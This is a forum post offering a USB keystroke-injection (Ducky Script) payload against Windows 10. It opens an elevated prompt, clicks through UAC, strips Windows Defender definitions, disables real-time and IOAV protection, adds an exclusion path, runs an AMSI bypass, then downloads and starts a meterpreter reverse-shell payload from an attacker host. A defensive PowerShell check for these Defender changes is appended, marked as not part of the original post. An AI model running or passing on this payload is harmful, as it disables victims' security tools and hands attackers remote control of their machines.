mikeOxmaul

[PAYLOAD] Disable Windows Defender - Windows 10 (ver. 1809)


Disclaimer: Originally written in Ducky Script, then converted to Arduino for a school project. The linked video uses an Arduino Pro Micro.
POC: https://youtu.be/3hDdLbwFiM8
REM Title: msfQuack.txt
REM Author: mikeOxmaul (Props: Dan Tentler <Twitter @Viss> and Matt Graeber <Twitter @mattifestation>)
REM Date: 20020308
REM Target: Windows 10 (v. 1809)
REM Assumptions:
REM 1. Used against unlocked device w/admin lvl privileges
REM 2. Default 'prompt for consent' UAC policy in place for admin accts
REM Script will do the following:
REM 1. Remove Security Definitions for Windows Defender & Disable IOffice AV Protection
REM 2. Disable Real Time Monitoring Protection & Add Exclusion Path
REM 3. Download, Save and Run payload (windows/meterpreter/reverse_tcp)
REM Apologies in advance for the funky delays and not using 'GUI r'.  Tested on VirtualBox 6.1 on a macOS host.

REM Payload Start

DELAY 3000
REM 3 second delay for device to register
CTRL ESC
REM keyboard shortcut for search bar
DELAY 1700
STRING cmd
REM searching for cmd prompt
DELAY 750
CTRL SHIFT ENTER
REM 'run as admin' keyboard shortcut
DELAY 2500
ALT y
REM bypass UAC prompt
DELAY 1500
STRING cd %userprofile%
ENTER
DELAY 100
STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
REM Removes all security definitions for windows defender and disables AV protection (credit to Dan Tentler)
ENTER
DELAY 100
STRING powershell
ENTER
DELAY 2500
STRING Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "<define exclusion path here>"
REM Disables defender's 'real time monitoring' and sets exclusion path in event defender conducts a scan
ENTER
DELAY 100
STRING "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
REM One line AMSI bypass (courtesy of Matt Graeber)
ENTER
DELAY 100
STRING iex (New-Object System.Net.WebClient).DownloadFile('http://<ipaddr>/<payload>','<path\to\payload>');Start-Process .\"<path\to\payload>"\
ENTER
DELAY 100
STRING exit
ENTER
REM Exiting Powershell
DELAY 1000
STRING exit
ENTER
REM End of Payload
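
As an added detection-side example, not part of the original post: an elevated PowerShell check for the Defender state this payload leaves behind (DisableRealtimeMonitoring, DisableIOAVProtection, a new ExclusionPath, removed definitions). It reads the same preferences the payload sets and the Defender operational log; event IDs 5001/5004/5007 are Defender's own "protection disabled / configuration changed" events, and the 7-day signature-age threshold is an assumption.

```powershell
# Added example (not the original post's code): look for the Defender tampering
# described above on a Windows 10 host. Run in an elevated PowerShell session;
# assumes the built-in Defender cmdlets and event channel are present.
$findings = @()

# 1. Preference state changed by the payload's Set-MpPreference / Add-MpPreference lines
$pref = Get-MpPreference
if ($pref.DisableRealtimeMonitoring) { $findings += 'Real-time monitoring disabled (DisableRealtimeMonitoring)' }
if ($pref.DisableIOAVProtection)     { $findings += 'IOAV protection disabled (DisableIOAVProtection)' }
if ($pref.ExclusionPath) {
    $findings += "Exclusion paths present: $($pref.ExclusionPath -join ', ')"
}

# 2. Engine status, including the signature set that MpCmdRun -RemoveDefinitions -All clears
$status = Get-MpComputerStatus
if (-not $status.RealTimeProtectionEnabled) { $findings += 'RealTimeProtectionEnabled is false' }
if (-not $status.AntivirusEnabled)          { $findings += 'AntivirusEnabled is false' }
# Assumption: signatures older than 7 days are treated as stale or removed
if ($status.AntivirusSignatureLastUpdated -lt (Get-Date).AddDays(-7)) {
    $findings += "Signatures last updated $($status.AntivirusSignatureLastUpdated)"
}

# 3. Defender operational log, last 24 hours:
#    5001 = real-time protection disabled
#    5004 = real-time protection configuration changed
#    5007 = configuration changed (covers exclusion and IOAV changes)
$filter = @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5001, 5004, 5007
    StartTime = (Get-Date).AddHours(-24)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $findings += '[{0}] EventID {1}: {2}' -f $e.TimeCreated, $e.Id, ($e.Message -split "`n")[0]
}

if ($findings.Count -eq 0) {
    Write-Output 'No Defender tampering indicators found.'
} else {
    Write-Output 'Defender tampering indicators:'
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

A clean host reports no indicators; on a host where this payload ran, the preference flags, the exclusion path and the 5001/5007 events all surface together.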
